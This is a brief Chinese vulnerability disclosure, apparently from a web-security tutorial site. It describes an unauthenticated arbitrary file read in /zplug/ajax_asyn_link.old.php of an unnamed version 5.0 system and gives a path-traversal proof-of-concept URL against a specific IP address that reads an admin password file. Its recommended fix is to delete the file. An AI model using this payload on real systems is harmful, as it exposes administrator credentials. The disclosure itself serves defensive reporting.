版本:5.0 不需要登录 /zplug/ajax_asyn_link.old.php 中参数url未合理过滤导致一处任意文件读取 漏洞 官方演示站点exp演示: http://202.119.47.33:81/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php 查看源代码: ![]() ![]() 修复: 经查为无效文件,可以删除 |
-
上一篇: phpyun某功能对参数处理不严可导致sql注入 - 网站
下一篇: 逐浪cms SQL注入 - 网站安全 - 自学php
还没有人抢沙发呢~